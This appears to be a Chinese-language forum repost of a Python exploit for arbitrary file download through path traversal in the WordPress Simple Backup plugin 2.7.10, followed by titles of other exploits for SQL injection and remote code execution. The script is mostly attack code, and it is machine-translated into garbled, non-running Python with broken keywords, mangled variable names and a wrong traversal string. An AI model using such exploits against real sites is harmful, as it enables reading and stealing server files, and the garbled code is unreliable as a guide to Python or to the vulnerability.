简单备份插件Python漏洞利用2.7.10-路径遍历

[HackApt-37 Team已验证会员]

＃利用标题:简单备份插件2.7.10-任意文件通过路径遍历下载
＃日期: 2024-03-06
＃利用作者: ven3xy
＃软件link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
＃版本: 2.7.10
＃在: Linux上测试
导入系统
导入请求
从urllib.parse导入urljoin
进口时间
def exploit（target_url，file_name，depth）:
遍历='./' *深度
exploit_url=urljoin（target_url，'/wp-admin/tools.php'）
params={
'page':'backup_manager'，
'download_backup_file': f'{traversal} {file_name}'
}
响应=requests.get（exploit_url，params=params）
如果wif wiss.status_code==200和wendesp.headers.get（'content-disposition'）\
和依恋； fileName'in wenders.headers ['content-disposition'] \
and响应。headers.get（'content-Lengths'）和int（response.headers ['content-Lengths']）0:
print（wendesp.text）＃替换为下载内容的所需操作
file_path=f'simplebackup_ {file_name}'
用file:打开（file_path，'wb'）
file.write（响应。
打印（f'file保存在: {file_path}'）
其他:
打印（“没有下载。您可以尝试更改深度参数或验证正确的文件名。”）
如果name=='__ -Main __':
如果Len（sys.argv）！=4:
打印（'USAGE: Python Exploit.py target_url file_name depth'）
sys.exit（1）
target_url=sys.argv [1]
file_name=sys.argv [2]
深度=int（sys.argv [3]）
print（'\ n [+]利用-VENEXY ||简单备份插件2.7.10 exploit \ n \ n'）
时间。
exploit（target_url，file_name，深度）

 

H

在1.0菲律宾比索的在线酒店预订- 盲目SQL注射（未经身份验证）

H

Livesite版本2019.1-远程代码执行